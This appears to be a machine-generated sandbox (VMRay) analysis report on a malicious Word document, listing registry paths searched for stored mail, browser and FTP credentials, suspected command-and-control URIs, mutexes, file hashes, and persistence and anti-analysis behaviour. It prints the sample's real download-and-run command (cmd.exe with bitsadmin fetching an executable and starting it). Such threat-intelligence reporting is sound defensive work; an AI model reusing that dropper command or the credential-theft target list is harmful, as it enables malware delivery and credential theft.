HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 HKEY_CURRENT_USER Email WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 HKEY_CURRENT_USER Email Email WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 HKEY_CURRENT_USER Email WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Windows Mail HKEY_CURRENT_USER Salt WinRegistryKey Software\Microsoft\Windows Live Mail HKEY_CURRENT_USER WinRegistryKey Software\Mozilla HKEY_CURRENT_USER WinRegistryKey Software\Mozilla\Firefox HKEY_CURRENT_USER WinRegistryKey Software\Mozilla HKEY_LOCAL_MACHINE WinRegistryKey Software\Mozilla\Firefox HKEY_LOCAL_MACHINE WinRegistryKey Software\Mozilla\Mozilla Firefox HKEY_LOCAL_MACHINE WinRegistryKey Software\Mozilla\Mozilla Firefox 25.0 HKEY_LOCAL_MACHINE WinRegistryKey Software\Martin Prikryl HKEY_CURRENT_USER WinRegistryKey Software\Martin Prikryl HKEY_LOCAL_MACHINE WinRegistryKey Software\Ghisler\Windows Commander HKEY_CURRENT_USER WinRegistryKey Software\Ghisler\Total Commander HKEY_CURRENT_USER WinRegistryKey Software\Ghisler\Windows Commander HKEY_LOCAL_MACHINE WinRegistryKey Software\Ghisler\Total Commander HKEY_LOCAL_MACHINE WinRegistryKey Software\FileZilla HKEY_CURRENT_USER WinRegistryKey Software\FileZilla Client HKEY_CURRENT_USER WinRegistryKey Software\FileZilla HKEY_LOCAL_MACHINE WinRegistryKey Software\FileZilla Client HKEY_LOCAL_MACHINE WinRegistryKey Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar HKEY_CURRENT_USER WinRegistryKey Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar HKEY_CURRENT_USER WinRegistryKey Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar HKEY_CURRENT_USER WinRegistryKey Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar HKEY_CURRENT_USER WinRegistryKey Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar HKEY_CURRENT_USER WinRegistryKey Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar HKEY_CURRENT_USER WinRegistryKey Software\GlobalSCAPE\CuteFTP 9\QCToolbar HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\IntelliForms\FormData HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player Plugin HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40 HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 25.0 (x86 en-US) HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VMRayVMTools HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E} HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757 HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757 HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173 HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173 HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860 HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860 HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655 HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655 HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743 HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743 HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063 HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063 HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573 HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573 HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F03217071FF} HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f} HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3c3aafc8-d898-43ec-998f-965ffdae065a} HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10} HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10} HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{582EA838-9199-3518-A05C-DB09462F68EC} HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{68306422-7C57-373F-8860-D26CE4BA2A15} HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2} HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F} HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AA0000000001} HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B175520C-86A2-35A7-8619-86DC379688B9} HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB} HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6} HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{e52a6842-b0ac-476e-b48f-378a97a67346} HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{e6e75766-da0f-4ba2-9788-6ea593ce702d} HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5} HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757 HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757 HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173 HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173 HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860 HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860 HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655 HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655 HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743 HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743 HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063 HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063 HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573 HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573 HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{f325f05b-f963-4640-a43b-c8a494cdda0f} HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185} HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Eteg WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 HKEY_CURRENT_USER SMTP Server WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 HKEY_CURRENT_USER POP3 Server WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 HKEY_CURRENT_USER IMAP Server WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 HKEY_CURRENT_USER SMTP User WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 HKEY_CURRENT_USER POP3 User WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 HKEY_CURRENT_USER IMAP User WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 HKEY_CURRENT_USER SMTP Password WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 HKEY_CURRENT_USER POP3 Password WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 HKEY_CURRENT_USER IMAP Password WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 HKEY_CURRENT_USER SMTP Server SMTP Server WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 HKEY_CURRENT_USER POP3 Server POP3 Server WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 HKEY_CURRENT_USER IMAP Server WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 HKEY_CURRENT_USER SMTP User WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 HKEY_CURRENT_USER POP3 User POP3 User WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 HKEY_CURRENT_USER IMAP User WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 HKEY_CURRENT_USER SMTP Password WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 HKEY_CURRENT_USER POP3 Password WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 HKEY_CURRENT_USER IMAP Password WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 HKEY_CURRENT_USER SMTP Server WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 HKEY_CURRENT_USER POP3 Server WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 HKEY_CURRENT_USER IMAP Server WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 HKEY_CURRENT_USER SMTP User WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 HKEY_CURRENT_USER POP3 User WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 HKEY_CURRENT_USER IMAP User WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 HKEY_CURRENT_USER SMTP Password WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 HKEY_CURRENT_USER POP3 Password WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 HKEY_CURRENT_USER IMAP Password WinRegistryKey Software\Mozilla\Firefox HKEY_CURRENT_USER PathToExe WinRegistryKey Software\Mozilla\Firefox HKEY_LOCAL_MACHINE PathToExe WinRegistryKey Software\Mozilla\Mozilla Firefox HKEY_LOCAL_MACHINE PathToExe WinRegistryKey Software\Mozilla\Mozilla Firefox 25.0 HKEY_LOCAL_MACHINE PathToExe WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player Plugin HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 25.0 (x86 en-US) HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VMRayVMTools HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E} HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F03217071FF} HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f} HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3c3aafc8-d898-43ec-998f-965ffdae065a} HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{582EA838-9199-3518-A05C-DB09462F68EC} HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{68306422-7C57-373F-8860-D26CE4BA2A15} HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2} HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F} HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AA0000000001} HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B175520C-86A2-35A7-8619-86DC379688B9} HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB} HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6} HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{e52a6842-b0ac-476e-b48f-378a97a67346} HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{e6e75766-da0f-4ba2-9788-6ea593ce702d} HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5} HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{f325f05b-f963-4640-a43b-c8a494cdda0f} HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185} HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Eteg WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna URI aaopsjdf.top/MYXYt50L/l18RCMcJRNGj_aHp0/HXQOQ Contains URI aaopsjdf.top/di/vm/8tO/N/d/VEPSK/z/Z3Z/w/Cm/EHA Contains URI aaopsjdf.top/dnoLVKjaeD/vmgm/HeV3HvyL/4/J3ey/w/y/2Pg Contains URI aaopsjdf.top/v6mlq8VpQl/rDA/k/P/cI/EIu/2_yI-/G/y/SyRTQ Contains URI aaopsjdf.top/9TzYkm/41IzC/N/hR/TcmU_ZLdnRSaLA Contains URI aaopsjdf.top/dtSYRF8h/vnIaCOF/6TPWK0Krp9g/b/YH/Q/ Contains URI aaopsjdf.top/sjtXcaxKxG/qW/w9/CdBdDN/a/W/44ra0Bi/DFA/ Contains URI aaopsjdf.top/bjJ0Il/u/GwDYfpQFveklLDcx/iq/qRQ Contains URI aaopsjdf.top/Yjc2A8Gst/g/2/wqY_IEM-6a_ZPTl/gH/YMg Contains URI aaopsjdf.top/IPPKGT6kjF/k1/YZGv/RoQvaE4rDg9/AunIQ Contains URI aaopsjdf.top/X8CyRU/gj4KKOFp/LKWt3avl_/H/ijD/A Contains Mutex B3F6E53F120A5BE5825B9C06159BB3F4 WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Eteg WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Eteg Analyzed Sample #20911 Malware Artifacts 20911 Sample-ID: #20911 Job-ID: #16639 This sample was analyzed by VMRay Analyzer 2.2.0 on a Windows 7 system 0 VTI Score based on VTI Database Version 2.6 Metadata of Sample File #20911 Submission-ID: #21826 C:\Users\aETAdzjz\Desktop\receipt-parcel-UK980-456.doc doc MD5 1dfa6c28e296b4196f92c8b97e050754 SHA1 b8c701c3a0059820ee60111aa3cc6add2dbc33d0 SHA256 880b352d1186a1c33d73a42907ee9b9902363c2358fe9f0c540c776602093772 Opened_By Metadata of Analysis for Job-ID #16639 Timeout False x86 64-bit win7_64_sp1-mso2016 True Windows 7 6.1.7601.17514 (3844dbb9-2017-4967-be7a-a4a2c20430fa) 614.142 This is a property collection for additional information of VMRay analysis VMRay Analyzer Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "cmd.exe /c "waitfor /t 5 YKERQ & bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1 %appdata%\iuoldw.exe &start %appdata%\iuoldw.exe"". Create process Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Windows\system32\waitfor.exe". Create process Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Windows\system32\bitsadmin.exe". Create process Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe". Create process Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create nameless mutex. Create system object Information Stealing VTI rule match with VTI rule score 2/5 vmray_read_windows_install_date Read the Windows installation date from registry. Read system data Information Stealing VTI rule match with VTI rule score 3/5 vmray_read_windows_license_by_registry Readout Windows license key. Read system data Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "9B4D68961731FE3C22DA08B640799EB6". Create system object Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "Sandboxie_SingleInstanceMutex_Control". Create system object Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "Frz_State". Create system object Anti Analysis VTI rule match with VTI rule score 5/5 vmray_detect_wine_by_getprocaddress Possibly trying to detect "wine" by calling GetProcAddress() on "wine_get_unix_file_name". Try to detect application sandbox Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process ""C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe"". Create process Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "C2E6ECE9938A43206F172A85684E36DB". Create system object Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process ""C:\Windows\system32\cmd.exe" /c "C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat"". Create process Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Windows\SysWOW64\svchost.exe -k netsvcs". Create process Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "CEE48AFA231AB21CA6E2437DB844BAD7". Create system object Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "E58EFF540968A436E982FCFA1C0445A2". Create system object Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "B3F6E53F120A5BE5825B9C06159BB3F4". Create system object Persistence VTI rule match with VTI rule score 3/5 vmray_install_startup_script_by_registry Add ""C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe"" to windows startup via registry. Install system startup script or application Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "ABC6B5B774FF9FD7F54EC277098C64EE". Create system object Hide Tracks VTI rule match with VTI rule score 2/5 vmray_hide_data_in_registry Hide 1776 byte in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci\Baywkivyl". Write large data into the registry Anti Analysis VTI rule match with VTI rule score 3/5 vmray_delay_execution_by_sleep One thread sleeps more than 5 minutes. Delay execution Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name 